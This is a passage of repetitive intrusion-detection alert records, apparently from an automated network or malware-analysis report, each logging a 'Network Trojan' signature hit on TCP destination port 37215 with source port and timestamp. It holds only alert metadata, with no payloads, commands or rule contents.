          SID:2829579
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637911
          SID:2829579
          Source Port:54528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416076
          SID:2835222
          Source Port:56902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288819
          SID:2829579
          Source Port:48668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820212
          SID:2835222
          Source Port:48530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714725
          SID:2835222
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720107
          SID:2835222
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230433
          SID:2829579
          Source Port:51040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132544
          SID:2835222
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920044
          SID:2835222
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869359
          SID:2835222
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287207
          SID:2835222
          Source Port:45386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274647
          SID:2829579
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412287
          SID:2829579
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272790
          SID:2835222
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283125
          SID:2835222
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687606
          SID:2829579
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155848
          SID:2829579
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417526
          SID:2829579
          Source Port:33450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917856
          SID:2829579
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821414
          SID:2835222
          Source Port:55046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886903
          SID:2829579
          Source Port:45728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134214
          SID:2829579
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289878
          SID:2829579
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861324
          SID:2829579
          Source Port:43586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004628
          SID:2835222
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242713
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917101
          SID:2829579
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600324
          SID:2829579
          Source Port:40508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948714
          SID:2829579
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416285
          SID:2835222
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562081
          SID:2829579
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671563
          SID:2829579
          Source Port:48792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645440
          SID:2835222
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161074
          SID:2829579
          Source Port:52024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412503
          SID:2835222
          Source Port:53952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644889
          SID:2835222
          Source Port:45148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286033
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724334
          SID:2835222
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419087
          SID:2829579
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718133
          SID:2835222
          Source Port:36326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035642
          SID:2829579
          Source Port:60532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476693
          SID:2835222
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298878
          SID:2829579
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926912
          SID:2829579
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158314
          SID:2829579
          Source Port:47970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078835
          SID:2835222
          Source Port:43594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538281
          SID:2829579
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164382
          SID:2829579
          Source Port:51076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596161
          SID:2835222
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205852
          SID:2829579
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241865
          SID:2829579
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869683
          SID:2829579
          Source Port:60252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718297
          SID:2829579
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084548
          SID:2835222
          Source Port:41464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469746
          SID:2829579
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284922
          SID:2835222
          Source Port:36698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104261
          SID:2835222
          Source Port:54596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988767
          SID:2829579
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031920
          SID:2829579
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864526
          SID:2835222
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717771
          SID:2835222
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919119
          SID:2835222
          Source Port:59692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032747
          SID:2835222
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028316
          SID:2829579
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602478
          SID:2829579
          Source Port:47198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468344
          SID:2835222
          Source Port:49440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716883
          SID:2835222
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027093
          SID:2829579
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166568
          SID:2835222
          Source Port:37048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986705
          SID:2835222
          Source Port:53748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205519
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033006
          SID:2829579
          Source Port:43710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918114
          SID:2835222
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917937
          SID:2835222
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2835222
          Source Port:39372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868945
          SID:2829579
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034794
          SID:2835222
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601078
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010761
          SID:2829579
          Source Port:34884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284131
          SID:2835222
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119883
          SID:2829579
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249548
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569311
          SID:2829579
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2829579
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413038
          SID:2829579
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288510
          SID:2829579
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928853
          SID:2835222
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163567
          SID:2829579
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667785
          SID:2835222
          Source Port:35232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918187
          SID:2835222
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930394
          SID:2829579
          Source Port:48442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399971
          SID:2835222
          Source Port:45412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476912
          SID:2829579
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416261
          SID:2829579
          Source Port:51384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251286
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289775
          SID:2829579
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478185
          SID:2835222
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719382
          SID:2829579
          Source Port:47162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951941
          SID:2835222
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248163
          SID:2829579
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028722
          SID:2835222
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643948
          SID:2829579
          Source Port:47084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028687
          SID:2835222
          Source Port:57834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946091
          SID:2829579
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599448
          SID:2829579
          Source Port:33984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866197
          SID:2829579
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821360
          SID:2829579
          Source Port:44456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990612
          SID:2835222
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645519
          SID:2835222
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947049
          SID:2835222
          Source Port:49920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249454
          SID:2829579
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.717047
          SID:2829579
          Source Port:34456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412891
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414318
          SID:2835222
          Source Port:53730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986329
          SID:2835222
          Source Port:34778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248311
          SID:2835222
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897818
          SID:2829579
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904514
          SID:2835222
          Source Port:59624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017215
          SID:2835222
          Source Port:47186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923737
          SID:2829579
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822656
          SID:2835222
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869792
          SID:2829579
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035460
          SID:2835222
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819270
          SID:2829579
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928828
          SID:2835222
          Source Port:38296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412920
          SID:2829579
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103869
          SID:2835222
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287340
          SID:2835222
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248211
          SID:2835222
          Source Port:38764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396979
          SID:2835222
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684623
          SID:2829579
          Source Port:36478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606066
          SID:2829579
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823723
          SID:2835222
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990507
          SID:2829579
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104807
          SID:2829579
          Source Port:45106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568405
          SID:2829579
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646434
          SID:2829579
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.638065
          SID:2829579
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035892
          SID:2829579
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033596
          SID:2835222
          Source Port:60212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892780
          SID:2829579
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078669
          SID:2835222
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160957
          SID:2829579
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036254
          SID:2835222
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469371
          SID:2829579
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714798
          SID:2829579
          Source Port:58756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291703
          SID:2835222
          Source Port:57392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718434
          SID:2829579
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103964
          SID:2835222
          Source Port:39198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398700
          SID:2835222
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288704
          SID:2835222
          Source Port:42470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606861
          SID:2835222
          Source Port:50704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288930
          SID:2835222
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037518
          SID:2835222
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929746
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557515
          SID:2835222
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599356
          SID:2835222
          Source Port:57756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606089
          SID:2829579
          Source Port:51394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419464
          SID:2829579
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719512
          SID:2835222
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080459
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469450
          SID:2835222
          Source Port:42132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299737
          SID:2829579
          Source Port:38378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538552
          SID:2835222
          Source Port:49954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417455
          SID:2829579
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036172
          SID:2829579
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466293
          SID:2829579
          Source Port:47776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.266498
          SID:2835222
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012557
          SID:2829579
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986954
          SID:2829579
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946379
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989536
          SID:2829579
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271212
          SID:2835222
          Source Port:51952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102227
          SID:2829579
          Source Port:55072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646375
          SID:2829579
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538164
          SID:2835222
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715566
          SID:2829579
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160246
          SID:2829579
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223888
          SID:2835222
          Source Port:39450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644051
          SID:2829579
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676094
          SID:2835222
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290573
          SID:2829579
          Source Port:39842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567382
          SID:2835222
          Source Port:38308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085844
          SID:2835222
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891114
          SID:2829579
          Source Port:36850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566389
          SID:2835222
          Source Port:38916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159583
          SID:2835222
          Source Port:56282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129377
          SID:2829579
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163160
          SID:2835222
          Source Port:42488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868997
          SID:2835222
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067272
          SID:2829579
          Source Port:45382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914630
          SID:2835222
          Source Port:54782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998408
          SID:2835222
          Source Port:51916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923127
          SID:2829579
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715565
          SID:2829579
          Source Port:46664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398203
          SID:2835222
          Source Port:56304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028809
          SID:2829579
          Source Port:34638
          Destination Port:37215
